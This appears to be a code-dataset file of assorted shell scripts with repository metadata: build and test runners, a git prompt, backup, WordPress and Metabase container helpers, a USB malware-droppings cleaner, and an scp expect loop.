echo "=============================================================="
# change back to working dir
echo "cd $working_dir/"
cd $working_dir/
# copy dsp files
copy_dsp_files $board $dsp1_proj $project
fi
# dsp0 build start
if [ ! -z "$dsp0_proj" ]; then
echo "cd $working_dir/dsp"
cd $working_dir/dsp
echo "=============================================================="
echo "Start DSP0 Build"
echo "=============================================================="
#echo "Start DSP0 Build: "`date` >> $output_dir/log/build_time.log
./build.sh $board $dsp0_proj
DSP0_BUILD_RESULT=$?
#echo "End DSP0 Build: "`date` >> $output_dir/log/build_time.log
echo "=============================================================="
echo "End DSP0 Build"
echo "=============================================================="
# change back to working dir
echo "cd $working_dir/"
cd $working_dir/
# copy dsp files
copy_dsp_files $board $dsp0_proj $project
fi
# cm4 build start
if [ ! -z "$cm4_proj" ]; then
echo "cd $working_dir/mcu"
cd $working_dir/mcu
echo "=============================================================="
echo "Start CM4 Build"
echo "=============================================================="
#echo "Start CM4 Build: "`date` >> $output_dir/log/build_time.log
if [ ! -z "$feature_mk" ]; then
./build.sh $board $cm4_proj -f=$feature_mk bl
else
./build.sh $board $cm4_proj bl
fi
CM4_BUILD_RESULT=$?
#echo "End CM4 Build: "`date` >> $output_dir/log/build_time.log
echo "=============================================================="
echo "End CM4 Build"
echo "=============================================================="
# change back to working dir
echo "cd $working_dir/"
cd $working_dir/
# copy cm4 files
copy_cm4_files $board $cm4_proj $project
fi
# update flash_download.cfg
flash_cfg=$output_dir/download/flash_download.cfg
if [ -e "$flash_cfg" ]; then
if [ ! -z "$dsp0_proj" ]; then
sed -i "s|\bdsp0_freertos_create_thread.bin|${dsp0_proj}.bin|g" $flash_cfg
sed -i -n '{/rom:/{x;n;{/dsp0/{x;s|^#||;p;x;tc};x;p;be}};{:c;/\bdsp0_/,+2s|^#||;}};p;bend;:e;x;p;:end' $flash_cfg
fi
if [ ! -z "$dsp1_proj" ]; then
sed -i "s|\bdsp1_no_rtos_initialize_system.bin|${dsp1_proj}.bin|g" $flash_cfg
sed -i -n '{/rom:/{x;n;{/dsp1/{x;s|^#||;p;x;tc};x;p;be}};{:c;/\bdsp1_/,+2s|^#||;}};p;bend;:e;x;p;:end' $flash_cfg
fi
fi
# return code
declare -i BUILD_RESULT=0
echo "End CO-Build: "`date` >> $output_dir/log/build_time.log
if [ ! -z "$DSP1_BUILD_RESULT" ]; then
if [ "$DSP1_BUILD_RESULT" -eq "0" ]; then
echo "DSP1 BUILD: PASS" >> $output_dir/log/build_time.log
else
echo "DSP1 BUILD: FAIL" >> $output_dir/log/build_time.log
BUILD_RESULT+=1
fi
fi
if [ ! -z "$DSP0_BUILD_RESULT" ]; then
if [ "$DSP0_BUILD_RESULT" -eq "0" ]; then
echo "DSP0 BUILD: PASS" >> $output_dir/log/build_time.log
else
echo "DSP0 BUILD: FAIL" >> $output_dir/log/build_time.log
BUILD_RESULT+=1
fi
fi
if [ ! -z "$CM4_BUILD_RESULT" ]; then
if [ "$CM4_BUILD_RESULT" -eq "0" ]; then
echo "CM4 BUILD: PASS" >> $output_dir/log/build_time.log
else
echo "CM4 BUILD: FAIL" >> $output_dir/log/build_time.log
BUILD_RESULT+=1
fi
fi
if [ "$BUILD_RESULT" -eq "0" ]; then
echo "TOTAL CO-BUILD: PASS (return code $BUILD_RESULT)" >> $output_dir/log/build_time.log
else
echo "TOTAL CO-BUILD: FAIL (return code $BUILD_RESULT)" >> $output_dir/log/build_time.log
fi
echo "=============================================================="
echo "Summary CO-BUILD"
echo "=============================================================="
cat $output_dir/log/build_time.log
mv -f $output_dir/*.log $output_dir/log/ 2> /dev/null
exit $BUILD_RESULT
fi
| true
|
af1ba8c2cf9c0661524112a275a1ac22116b6b04
|
Shell
|
parampavar/cube.js
|
/.github/actions/integration/druid.sh
|
UTF-8
| 505
| 2.5625
| 3
|
[
"MIT",
"Apache-2.0",
"Cube"
] |
permissive
|
#!/bin/bash
# Run the Druid integration test suite inside a GitHub Actions log group.
set -eo pipefail

# Debug log for test containers
export DEBUG=testcontainers

# Pinned image versions used by the integration tests.
export TEST_POSTGRES_VERSION=13
export TEST_ZOOKEEPER_VERSION=3.5
export TEST_DRUID_VERSION=0.19.0

echo "::group::Druid ${TEST_DRUID_VERSION}";

# Pre-pull every container image the tests will start.
for image in \
  "postgres:${TEST_POSTGRES_VERSION}" \
  "zookeeper:${TEST_ZOOKEEPER_VERSION}" \
  "apache/druid:${TEST_DRUID_VERSION}"
do
  docker pull "$image"
done

echo "Druid ${TEST_DRUID_VERSION}";
yarn lerna run --concurrency 1 --stream --no-prefix integration:druid
echo "::endgroup::"
| true
|
2b910debe8ef60af3c90437f62ecede717a6fdb5
|
Shell
|
h0l0gram/bash-tools
|
/git-prompt.sh
|
UTF-8
| 3,949
| 3.875
| 4
|
[] |
no_license
|
#!/bin/bash
#
#Git prompt
#Author: Jan Hänsli
#Makes you a nice git prompt when in a git repository
#
#call "ginfo" for symbol explanation
#
# ANSI colour escapes and glyphs used to render the git prompt line.
R="\033[0;37m"
TITLE_COLOR="\033[0;36m"
SYMBOL_SPACE=
AHEAD_SYMBOL=↑${SYMBOL_SPACE}
AHEAD_COLOR="\033[0;32m"
BEHIND_SYMBOL=↓${SYMBOL_SPACE}
BEHIND_COLOR="\033[0;31m"
UPTODATE_SYMBOL=✔${SYMBOL_SPACE}
UPTODATE_COLOR="\033[0;32m"
UNTRACKED_SYMBOL=★${SYMBOL_SPACE}
UNTRACKED_COLOR="\033[0;33m"
STAGED_SYMBOL=⚑${SYMBOL_SPACE}
STAGED_COLOR="\033[01;33m"
DIRTY_SYMBOL=∴${SYMBOL_SPACE}
DIRTY_COLOR="\033[0;35m"
BRANCH_COLOR="\033[1;37m"
BRANCH_SYMBOL="\033[0;36m"→${SYMBOL_SPACE}$R
UPSTREAM_COLOR="\033[1;37m"
STASHED_SYMBOL="⚒${SYMBOL_SPACE}"
STASHED_COLOR="\033[0;36m"
TAG_COLOR="\033[37;48;5;17m"
# Print a legend explaining every symbol used by the git prompt.
# The body is a single multi-line printf; colours/symbols come from the
# globals defined at the top of this file.
function ginfo(){
printf "\n${TITLE_COLOR}Git Prompt v1.2.0$R
Author: Jan Haensli
https://github.com/h0l0gram/bash-tools
Symbols:
${AHEAD_COLOR}${AHEAD_SYMBOL} : commits ahead
${BEHIND_COLOR}${BEHIND_SYMBOL} : commits behind
${UPTODATE_COLOR}${UPTODATE_SYMBOL} : up to date
${STAGED_COLOR}${STAGED_SYMBOL} : staged files
${DIRTY_COLOR}${DIRTY_SYMBOL} : modified files (unstaged)
${UNTRACKED_COLOR}${UNTRACKED_SYMBOL} : untracked files
${STASHED_COLOR}${STASHED_SYMBOL} : stashed entries
${TAG_COLOR}1.0$R : tags
"
}
#######################################
# Build the coloured git status line used by git_prompt.
# Reads the colour/symbol globals defined above and the state of the
# repository in the current directory (git status/diff/stash/tag).
# Outputs: one formatted line on stdout (branch, upstream, ahead/behind,
#          staged/dirty/untracked/stash counts, tags at HEAD).
# Fix: the "ahead", "behind", "dirty", "staged" and "untracked"
# assignments were written as `var= value`, which runs `value` as a
# command with var empty in its environment instead of assigning it.
# They now use the same quoted form as the diverged-branch case below.
#######################################
function parse_git_status() {
  DIVERGE_PATTERN="Your branch and '(.*)' have diverged,"
  DIVERGE_PATTERN2="and have ([0-9]+) and ([0-9]+)"
  BRANCH_PATTERN="^On branch ([^${IFS}]*)"
  DIRTY_PATTERN=`git diff --numstat | wc -l | tr -d '[:space:]'`
  STAGED_PATTERN=`git diff --cached --numstat | wc -l | tr -d '[:space:]'`
  AHEAD_PATTERN="ahead of '(.*)'.* ([0-9]+) commit"
  BEHIND_PATTERN="behind '(.*)'.* ([0-9]+) commit"
  UNTRACKED_PATTERN=`git status -u -s | grep ^?? | wc -l | tr -d '[:space:]'`
  UPTODATE_PATTERN="up(-| )to(-| )date with '(.*)'"
  git_dirty="$(git diff --numstat | wc -l | tr -d '[:space:]')"
  git_staged="$(git diff --cached --numstat | wc -l | tr -d '[:space:]')"
  git_status="$(git status 2> /dev/null)"
  stash="$(git stash list | wc -l | tr -d '[:space:]')"
  # Tags pointing at HEAD, each rendered in the tag colour.
  git_tags="$(for tag in `git tag --points-at HEAD`; do echo -e -n "$TAG_COLOR$tag$R "; done)"
  if [[ ${git_status} =~ ${BRANCH_PATTERN} ]]; then
    branch=${BRANCH_COLOR}${BASH_REMATCH[1]}
  fi
  if [[ ${git_status} =~ ${AHEAD_PATTERN} ]]; then
    upstream=${BASH_REMATCH[1]}
    ahead=" ${AHEAD_COLOR}${AHEAD_SYMBOL}${BASH_REMATCH[2]}"
  fi
  if [[ ${git_status} =~ ${BEHIND_PATTERN} ]]; then
    upstream=${BASH_REMATCH[1]}
    behind=" ${BEHIND_COLOR}${BEHIND_SYMBOL}${BASH_REMATCH[2]}"
  fi
  if [[ ${git_status} =~ ${DIVERGE_PATTERN} ]]; then
    upstream=${BASH_REMATCH[1]}
    if [[ ${git_status} =~ ${DIVERGE_PATTERN2} ]]; then
      ahead=" ${AHEAD_COLOR}${AHEAD_SYMBOL}${BASH_REMATCH[1]}"
      behind=" ${BEHIND_COLOR}${BEHIND_SYMBOL}${BASH_REMATCH[2]}"
    fi
  fi
  if [[ ${git_status} =~ ${UPTODATE_PATTERN} ]]; then
    upstream=${BASH_REMATCH[3]}
    uptodate="${UPTODATE_COLOR}${UPTODATE_SYMBOL} "
  fi
  if [[ $DIRTY_PATTERN -gt 0 ]]; then
    dirty=" ${DIRTY_COLOR}${DIRTY_SYMBOL}$DIRTY_PATTERN"
  fi
  if [[ $STAGED_PATTERN -gt 0 ]]; then
    staged=" ${STAGED_COLOR}${STAGED_SYMBOL}$STAGED_PATTERN"
  fi
  if [[ $UNTRACKED_PATTERN -gt 0 ]]; then
    untracked=" ${UNTRACKED_COLOR}${UNTRACKED_SYMBOL}$UNTRACKED_PATTERN"
  fi
  if [[ $stash -gt 0 ]]; then
    stash_count=" ${STASHED_COLOR}${STASHED_SYMBOL}$stash"
  fi
  echo -e "${BRANCH_COLOR}($branch)${BRANCH_SYMBOL}${UPSTREAM_COLOR}($upstream)$ahead$behind$uptodate$staged$dirty$untracked$stash_count $git_tags"
}
# Print the git status line, but only when the current directory is
# inside a git work tree (silently does nothing elsewhere).
function git_prompt() {
  local tree_state
  tree_state=`git rev-parse --is-inside-work-tree 2>&1`
  if [ $? -ne 0 ]; then
    return;
  fi
  # rev-parse succeeds but prints "false" inside .git itself.
  if [[ "$tree_state" == "false" ]]; then
    return;
  fi
  local rendered
  rendered="$(parse_git_status)"
  printf "%s$R\n" "${rendered}"
}
git_prompt
| true
|
6b961117e2054731be2ed0bf5affa89b479f22e5
|
Shell
|
xianlimei/k8s-apps
|
/dockerfiles/backuper/entrypoint.sh
|
UTF-8
| 371
| 2.90625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh -xe
# Archive /target, upload the tarball to MinIO, then prune old backups.
# Required env: BACKUP_TARGET, MINIO_ACCESS_KEY, MINIO_SECRET_KEY.
if [ -z "${BACKUP_TARGET}" ]; then
	exit 1
fi
FILENAME=backup-${BACKUP_TARGET}-$(date +%Y%m%d%H%M%S).tar.gz
tar -zcvf /tmp/${FILENAME} /target
mc config host add minio http://192.168.1.56:9000 ${MINIO_ACCESS_KEY} ${MINIO_SECRET_KEY}
mc cp /tmp/${FILENAME} minio/backups/${BACKUP_TARGET}/${FILENAME}
# Fix: prune the bucket path we just uploaded to; the previous version
# hard-coded "ghost", leftover from an earlier copy of this script, so
# every other target's backups were never cleaned up.
mc rm -r --older-than 6 --force minio/backups/${BACKUP_TARGET}/
| true
|
801d481012e057921bd0e5a6671e2bbdec4e5ed0
|
Shell
|
naingyeminn/vFix
|
/vfix
|
UTF-8
| 484
| 3.09375
| 3
|
[
"WTFPL"
] |
permissive
|
#!/bin/bash
# Clean a (typically removable) drive of common Windows-malware
# droppings: RECYCLER folders, hidden-attribute flags on directories,
# planted .lnk shortcuts and autorun.inf files.
# Usage: vfix [mountpoint]   (defaults to the current directory)
# Fix: every expansion of $1/the target is now quoted so paths with
# spaces or glob characters no longer word-split, and the top-level
# `[ $1 ]` (which errors on multi-word arguments) is now `[ -n "$1" ]`.
function fix {
  local target="$1"
  local rec='RECYCLER'
  # Remove a RECYCLER folder under the target, or failing that in CWD.
  if [ -d "$target/$rec" ]; then
    rm -rf "$target/$rec"
  elif [ -d "$rec" ]; then
    rm -rf "$rec"
  fi
  # NTFS mounts appear as "fuseblk"; pick the matching attribute tool.
  local is_ntfs
  is_ntfs=$(findmnt -T "$target" | grep fuseblk)
  if [ -n "$is_ntfs" ]; then
    find "$target" -type d -exec setfattr -h -v 0x00000000 -n system.ntfs_attrib_be {} \;
  else
    find "$target" -type d -exec fatattr -h -s {} \;
  fi
  # Drop shortcut and autorun files the malware plants.
  find "$target" -type f -name "*.lnk" -exec rm -f {} \;
  find "$target" -type f -iname "autorun.inf" -exec rm -f {} \;
}

if [ -n "$1" ]; then
  fix "$1"
else
  fix ./
fi
| true
|
f602ac693e67bce60338af326dd27725e2f5a694
|
Shell
|
openbsd/src
|
/regress/sys/ffs/tests/unlink/04.t
|
UTF-8
| 298
| 2.703125
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
#!/bin/sh
# $FreeBSD: src/tools/regression/fstest/tests/unlink/04.t,v 1.1 2007/01/17 01:42:12 pjd Exp $
desc="unlink returns ENOENT if the named file does not exist"
# NOTE(review): `namegen` and `expect` come from the fstest harness that
# drives these .t files; they are not defined or sourced here.
n0=`namegen`
n1=`namegen`
# Create then unlink a file: second unlink must fail with ENOENT.
expect 0 create ${n0} 0644
expect 0 unlink ${n0}
expect ENOENT unlink ${n0}
# A name that never existed must also yield ENOENT.
expect ENOENT unlink ${n1}
| true
|
b96bae0d6020c43d60ce1a2d67b00a037064775e
|
Shell
|
utgwkk/dotfiles
|
/files/.zshrc
|
UTF-8
| 2,023
| 2.65625
| 3
|
[] |
no_license
|
# vim:set ft=zsh :
# Autoloadable functions and completion system.
fpath=(~/zsh/functions/*(N-/) $fpath)
autoload -U colors && colors
autoload -Uz compinit
compinit
# Directory stack behaviour.
setopt auto_pushd
setopt pushd_ignore_dups
# History: shared across sessions, very large, deduplicated.
setopt hist_ignore_space
setopt share_history
HISTFILE=~/.zsh_history
HISTSIZE=1000000
SAVEHIST=1000000
# Do not record a mistyped command on .zsh_history
# see also: http://www.zsh.org/mla/users/2014/msg00715.html
zshaddhistory() { whence ${${(z)1}[1]} >/dev/null || return 2 }
# Misc interactive behaviour.
setopt print_eight_bit
setopt no_beep
setopt no_flow_control
setopt ignore_eof
setopt interactive_comments
setopt auto_cd
setopt share_history
setopt hist_ignore_all_dups
setopt extended_glob
# Prompt: user@host, last exit status, clock and git info via __git_ps1.
setopt PROMPT_SUBST
source ~/local/etc/git-prompt.sh
PS1="%{${fg[green]}%}[%n@%m]%{${fg[red]}%} %(?..[%?] )%{${fg[cyan]}%}\$(date +%H:%M:%S)%{${fg[yellow]}%}\$(__git_ps1)%{${reset_color}%} %~
% %{${fg[red]}%}%%%{${reset_color}%} "
# Case-insensitive completion matching.
zstyle ':completion:*' matcher-list 'm:{a-zA-Z}={A-Za-z}'
# __git_ps1 feature flags.
GIT_PS1_SHOWDIRTYSTATE=true
GIT_PS1_SHOWUNTRACKEDFILES=true
GIT_PS1_SHOWSTASHSTATE=true
GIT_PS1_SHOWUPSTREAM=auto
source ~/.aliases
# Pager setup with coloured man pages.
export LESS='-i -M -R -W'
export PAGER=less
export LESS_TERMCAP_mb=$'\E[01;31m' # Begins blinking.
export LESS_TERMCAP_md=$'\E[01;31m' # Begins bold.
export LESS_TERMCAP_me=$'\E[0m' # Ends mode.
export LESS_TERMCAP_se=$'\E[0m' # Ends standout-mode.
export LESS_TERMCAP_so=$'\E[00;47;30m' # Begins standout-mode.
export LESS_TERMCAP_ue=$'\E[0m' # Ends underline.
export LESS_TERMCAP_us=$'\E[01;32m' # Begins underline.
export PATH=/usr/local/bin:$HOME/local/bin:$PATH
# Fuzzy history search bound to Ctrl-R, only when the needed tools exist.
# Fix: the guard used to be `[ test `which peco >/dev/null 2>&1` ]` —
# the substitution's output is discarded, so that reduces to `[ test ]`,
# a non-empty-string test that is ALWAYS true.  Check each tool properly.
if whence peco > /dev/null 2>&1 && whence tac > /dev/null 2>&1 && whence awk > /dev/null 2>&1; then
    # Deduplicated history, newest first, piped through peco.
    function peco-history-selection() {
        BUFFER=`history -n 1 | tac | awk '!a[$0]++' | peco | sed -e 's/\\\\n/\n/g'`
        CURSOR=$#BUFFER
        zle reset-prompt
    }
    zle -N peco-history-selection
    bindkey '^R' peco-history-selection
fi
# apply local .zshrc (machine-local overrides win over everything above)
if [ -f ~/.zshrc.local ]; then
    source ~/.zshrc.local
fi
| true
|
e951eb8901c90e524a453111098d0039704bd47b
|
Shell
|
vikigenius/voidwoken
|
/dotfiles/local/dotbin/rofi/powermenu
|
UTF-8
| 580
| 3.421875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Bash required for echo -e shenanigans !
# Show a rofi power menu and run the selected action.
rofi_command="rofi -theme theme/powermenu.rasi"

### Options ###
power_off=" Shutdown"
reboot=" Reboot"
lock=" Lock"
log_out=" Logout"

# One entry per line on rofi's stdin; the chosen line comes back verbatim.
menu_choice=$(printf '%s\n' "$power_off" "$reboot" "$lock" "$log_out" | $rofi_command -dmenu)

case "$menu_choice" in
    "$power_off") loginctl poweroff ;;
    "$reboot")    loginctl reboot ;;
    "$lock")      light-locker-command -l ;;
    "$log_out")   bspc quit ;;
esac
| true
|
55cba6b7e1b8c9b10c12f82fc5f66889181e491b
|
Shell
|
jturcino/glycresoft-qsub-templates
|
/templates/preprocess-mzml.qsub.tmpl
|
UTF-8
| 1,350
| 3.109375
| 3
|
[] |
no_license
|
#!/bin/bash
# SGE job script template: preprocess one mzML sample with glycresoft-cli.
# {{...}} placeholders are substituted by the submitting tool.
#$ -S /bin/bash
#$ -cwd
#$ -N preprocess-mzml-{{dataset}}-{{sample_id}}
#$ -j y
#$ -o preprocess-mzml-{{dataset}}-{{sample_id}}.qlog
#$ -P glyco-ms
#$ -V
{{email}}
echo "=========================================================="
echo "Starting on : $(date)"
echo "Running on node : $(hostname)"
echo "Current directory : $(pwd)"
echo "Current job ID : $JOB_ID"
echo "Current job name : $JOB_NAME"
echo "Task index number : $SGE_TASK_ID"
echo "=========================================================="
source ~/.bashrc
# Stage input/output onto node-local scratch space.
# NOTE(review): `scratch` is a site-local helper command — confirm its
# dir/push semantics before editing these lines.
scratchdir=`scratch dir -d preprocess-mzml-{{dataset}}-{{sample_id}}`
mzml_file=`scratch push -d $scratchdir "{{unprocessed_mzml_file}}"`
out_file=`scratch push -d $scratchdir "{{sample_id}}.preprocessed.mzML"`
# unzip if compressed
extension="${mzml_file##*.}"
if [ "$extension" == "gz" ]; then
  echo "Unzipping $mzml_file"
  gunzip $mzml_file
  mzml_file="${mzml_file%.gz}"
fi
# run glycresoft-cli preprocessing and remove original mzML file
glycresoft-cli mzml preprocess -p 6 -m 3 -a glycopeptide -s {{start_time}} -e {{end_time}} -an peptide $mzml_file $out_file
rm "$mzml_file"
# copy everything over
echo "Fetching finished files"
outdir="preprocess"
mkdir -p "$outdir"
cp $out_file "$outdir"/"{{sample_id}}".preprocessed.mzML
cp ${out_file}-idx.json "$outdir"/"{{sample_id}}".preprocessed.mzML-idx.json
| true
|
34082a9a22b811a63c2c32cb71824430defc2399
|
Shell
|
dellelce/mkit
|
/modules/xdamage/build.sh
|
UTF-8
| 157
| 2.65625
| 3
|
[] |
no_license
|
# Build the libXdamage module.
# When $prefix/lib/pkgconfig exists it is exported as PKG_CONFIG_PATH so
# dependent .pc files resolve, then the generic GNU-configure driver is
# invoked.  Returns build_gnuconf's exit status.
# Fix: expansions are now quoted so a prefix containing spaces does not
# word-split the test, the export or the source-directory argument.
build_xdamage()
{
 local pcdir="${prefix}/lib/pkgconfig"
 [ -d "$pcdir" ] && export PKG_CONFIG_PATH="$pcdir"
 build_gnuconf xdamage "$srcdir_xdamage"
 return $?
}
| true
|
68a733ad12cbb037eaac67bbe1ce6e88cbde6668
|
Shell
|
edvaldo-lima/extract_urls
|
/extract_urls_parser.sh
|
UTF-8
| 2,173
| 4.09375
| 4
|
[
"CC0-1.0"
] |
permissive
|
#!/usr/bin/env bash
#
# extract_urls.sh - Extracts URLs from a website.
#
# Autor: Edvaldo Lima
# Manutenção: Edvaldo Lima
#
# ------------------------------------------------------------------------ #
# Extracts URLs from a website https://www.ted.com/talks
#
# Exemplos:
# $ ./extract_urls.sh
# On this example the program webscrape the website and return only the
# URLs of the talks.
# ------------------------------------------------------------------------ #
# Histórico:
#
# v1.0 11/13/2020, Edvaldo:
# - Built a regex to webscrape the page and extract only urls of talks.
# v1.0 11/13/2020, Edvaldo:
# - Colored the urls extacted.
# v1.1 11/17/2020, Edvaldo:
# - Using configuration file (conf.cf) to pass parameters dinamically.
# - Using parser.sh to parse the conf.cf file used by ./extract_urls.sh.
# ------------------------------------------------------------------------ #
# Testado em:
# bash 5.0.17
# ------------------------------------------------------------------------ #
#
# ------------------------------- VARIÁVEIS -------------------------------#
CONFIGURATION_FILE="conf.cf"   # parsed by ./parser.sh into CONF_* variables
USE_UPPERCASE=
USE_COLORS=
TED_URLS="ted_urls.txt"        # scrape results land here
VERDE="\033[32;1;1m"           # green ANSI escape
# Load user preferences (CONF_USE_UPPERCASE / CONF_USE_COLORS).
# NOTE(review): eval of parser output assumes conf.cf is trusted input.
eval $(./parser.sh "$CONFIGURATION_FILE")
[ "$CONF_USE_UPPERCASE" = "1" ] && USE_UPPERCASE="1"
[ "$CONF_USE_COLORS" = "1" ] && USE_COLORS="1"
# ------------------------------------------------------------------------ #
# ------------------------------- EXECUÇÃO ------------------------------------#
# Scrape the first 10 result pages, keeping only talk-transcript URLs.
for i in {1..10} # loop through first 10 pages and save results to a file.
do
  lynx -source "https://www.ted.com/talks?language=en&page=$i&sort=popular" |
  grep "href='/talks/" |
  sed "s/^.*href='/https\:\/\/www\.ted\.com/;s/?.*$/\/transcript/" |
  uniq
done > "$TED_URLS"   # fix: was a hard-coded ted_urls.txt, now uses $TED_URLS
# Echo every URL, optionally uppercased and/or coloured green.
while read -r ted_urls # Read the text file and displays the urls in green on the screen
do
  if [ "$USE_UPPERCASE" = "1" ]; then
    MESSAGE="$(echo "${ted_urls}" | tr a-z A-Z)"
  else
    MESSAGE="${ted_urls}"
  fi
  [ "$USE_COLORS" = "1" ] && MESSAGE="$(echo -e ${VERDE}$MESSAGE)"
  echo -e "$MESSAGE"
done < "$TED_URLS"
| true
|
5029bde2c60ef0cf2ee352f866f6f7f00a922a8a
|
Shell
|
funkyproject/heroku-buildpack-php
|
/support/package_icu
|
UTF-8
| 916
| 3.578125
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Build libicu 51.2 from source, archive it and publish the tarball to
# S3 for the Heroku PHP buildpack.  Requires S3_BUCKET and s3cmd.
set -e
set -o pipefail

download_url="http://download.icu-project.org/files/icu4c/51.2/icu4c-51_2-src.tgz"

basedir="$( cd -P "$( dirname "$0" )" && pwd )"
source "$basedir/../conf/buildpack.conf"

export PATH=${basedir}/../vendor/bin:$PATH

if [ -z "$S3_BUCKET" ]; then
    echo "Must set S3_BUCKET environment variable" >&2
    exit 1
fi

# Fix: create the scratch directory atomically with mktemp -d instead of
# the racy and insecure mktemp-file / rm -rf / mkdir dance.
tempdir="$(mktemp -d -t libicu_XXXX)"
cd "$tempdir"

echo "-----> Downloading libicu"
curl -L "$download_url" | tar xzv

echo "-----> Compiling"
mkdir -p /app/vendor/libicu
cd icu
./source/runConfigureICU Linux --prefix=/app/vendor/libicu
make
make install

echo "-----> Building the archive"
pushd /app/vendor/libicu
tar czf "${tempdir}/libicu-51.tgz" *
popd

s3cmd put \
    --verbose --acl-public \
    "$tempdir/libicu-51.tgz" \
    "s3://$S3_BUCKET/package/libicu-51.tgz"

"$basedir/package-checksum" "libicu-51"
| true
|
297d476a626ad23a7277d464ead22e01082cf7f7
|
Shell
|
essentialkaos/bash-parsers
|
/prefs-parser.sh
|
UTF-8
| 647
| 3.359375
| 3
|
[
"Apache-2.0"
] |
permissive
|
SUPPORTED_OPTS=""   # space-separated whitelist of option names (set by the sourcing script)
PREFS_FILE=""       # path to the prefs file, may contain ~ (set by the sourcing script)
## PREFS PARSING ###############################################################
unset arg argn argp
# Expand a leading ~ to $HOME (plain string replacement, no globbing).
PREFS_FILE=${PREFS_FILE//\~/$HOME}
if [[ -n "$PREFS_FILE" && -r "$PREFS_FILE" ]] ; then
  while read -r arg ; do
    # Skip blank lines, comment lines and whitespace-only lines.
    [[ -z "$arg" || "$arg" =~ ^\# || "$arg" =~ ^\ +$ ]] && continue
    # "name: value" -> argn=name (dashes become underscores), argp=value (~ -> $HOME).
    arg="${arg/: /:}" ; argn="${arg%%:*}" ; argn="${argn//-/_}"
    argp="${arg#*:}" ; argp="${argp/\~/$HOME}"
    # Declare only whitelisted options that actually carry a value.
    [[ "$SUPPORTED_OPTS " =~ $argn\ && -n "$argp" ]] && declare "$argn=$argp"
  done < <(awk 1 "$PREFS_FILE")
  unset arg argn argp
fi
| true
|
b49e88fd29744c038dfc56acc956098e484733f0
|
Shell
|
jdevera/leb
|
/modules/pipx_packages.sh
|
UTF-8
| 894
| 3.625
| 4
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/usr/bin/env bash
# vim: set fdm=marker :
MODULE_NAME='Pipx Packages'
# Functions {{{
# True (exit 0) iff the given package already has a pipx-managed venv.
# Caches pipx's venv root in _PIPX_VENV_DIR and deliberately leaks it to
# the caller's scope so later calls skip the `pipx list` fork.
# is_dir is a helper from the surrounding framework.
function pipx_is_installed()
{
    local package=$1
    # Resolve first time and let it leak
    [[ -z $_PIPX_VENV_DIR ]] &&
        _PIPX_VENV_DIR=$(pipx list | sed -n 's/venvs are in //p')
    is_dir "$_PIPX_VENV_DIR/$package"
}
# Install the given pip packages via pipx, skipping ones already present.
# Arguments: package names.  Relies on the framework's log_* helpers,
# reload_rc and program_is_available.
function module_pipx_packages()
{
    local packages="$@"   # NOTE(review): flattens args; names must not contain spaces
    log_module_start
    reload_rc
    program_is_available pipx ||
        log_fatal "Could not find pipx"
    local INST=''
    # Collect only the packages that are not installed yet.
    for pkg in $packages
    do
        pipx_is_installed "$pkg" || INST="$INST $pkg"
    done
    # NOTE(review): assumes log_no_changes terminates the module; otherwise
    # an empty list would still fall through to the install loop below.
    [[ -z $INST ]] && log_no_changes
    log_info "Installing pip packages with pipx: $INST"
    for pkg in $INST
    do
        pipx install "$pkg" || log_error "Problem (pipx-)installing python package : $pkg"
    done
    log_module_end
}
# }}}
# Module invocation: the pipx packages this machine should have.
module_pipx_packages \
    pygments \
    colout2 \
    ;
| true
|
56561e5f4ced62ccec903c863eb88f73bbdd8915
|
Shell
|
17316781969/test_fab
|
/expect_scp.sh
|
UTF-8
| 633
| 3
| 3
|
[] |
no_license
|
#!/usr/bin/expect -f
# Copy a file to hosts 192.168.2.101..112 via scp, auto-answering the
# host-key prompt and supplying the password.
# Usage: expect_scp.sh <src_file> <dest_file>
# NOTE(review): ${password} is never set in this script; it must come
# from the caller's environment/templating or the send below will error.
set src_file [lindex $argv 0]
set dest_file [lindex $argv 1]
set timeout 3
# One scp per host, .101 through .112.
for {set i 1} {$i<=12} {incr i} {
spawn scp $src_file c@192.168.2.[expr {$i + 100}]:$dest_file
expect { -re "*(yes/no)?*" {send "yes\r"}}
expect {
-re ".*assword*." {
send "${password}\r" ;# why do you use ``\r\r''?
exp_continue
} "100%" {
puts "File Transfer successful\n"
set success1 0.5
exp_continue
} -re {[0-9]{1,2}%} {
exp_continue
} timeout {
set success2 0
set success1 0
} -re ".*closed by remote host" {
set success2 0.5
}
}
}
| true
|
8ac72d568b8d9526ea88262e727593df594d9a55
|
Shell
|
kawataku8/ft_service
|
/srcs/wordpress/srcs/start.sh
|
UTF-8
| 599
| 2.75
| 3
|
[] |
no_license
|
#!/bin/sh
# Container entrypoint: start php-fpm and telegraf, install WordPress
# via wp-cli, create demo users, then run nginx in the foreground.
rc-status
rc-service php-fpm7 start
/telegraf-1.17.2/usr/bin/telegraf --config /etc/telegraf/telegraf.conf &
cd /www/wordpress
wp core install \
	--url=https://192.168.49.50:5050 \
	--title=FTSERVICES_BLOG \
	--admin_user=admin \
	--admin_password=admin \
	--admin_email=wpadmin@example.com
# if mysql doesn't started yet, last command would fail
cmd_res=$?
if [ $cmd_res -ne 0 ]; then
	echo "mysql doesnt started yet"
	# Fix: `return` is only valid inside a function or a sourced script;
	# an entrypoint must `exit` so the container stops and gets restarted.
	exit 1
fi
wp user create bob bob@b.com \
	--role=author \
	--user_pass=bob
wp user create john john@j.com \
	--role=author \
	--user_pass=john
nginx
sleep infinity
| true
|
5220820c628bd3883471758d91a514f065b3ce24
|
Shell
|
dgleba/vamp206a
|
/bin1/metabase_stop1.sh
|
UTF-8
| 316
| 3.046875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Stop the Metabase JVM and rotate its log file.
# Fix: use pgrep -f instead of `ps aux | grep`, which also matched the
# grep process itself and put a stale PID in the kill list.
pid=$(pgrep -f metabase.jar)
# Only signal when something matched ($pid stays unquoted on purpose:
# pgrep may return several PIDs, one per line).
[ -n "$pid" ] && kill -9 $pid
set -vx
mv /home/albe/log/metabasebi.log /home/albe/log/metabasebi$(date +"__%Y.%m.%d_%H.%M.%S").log
set +vx
echo
echo Completed running metabase_stop1.sh.
echo
| true
|
62a5d19d8cc52592c550ceefc2b7c96b6b21c26a
|
Shell
|
zhgwenming/appstack
|
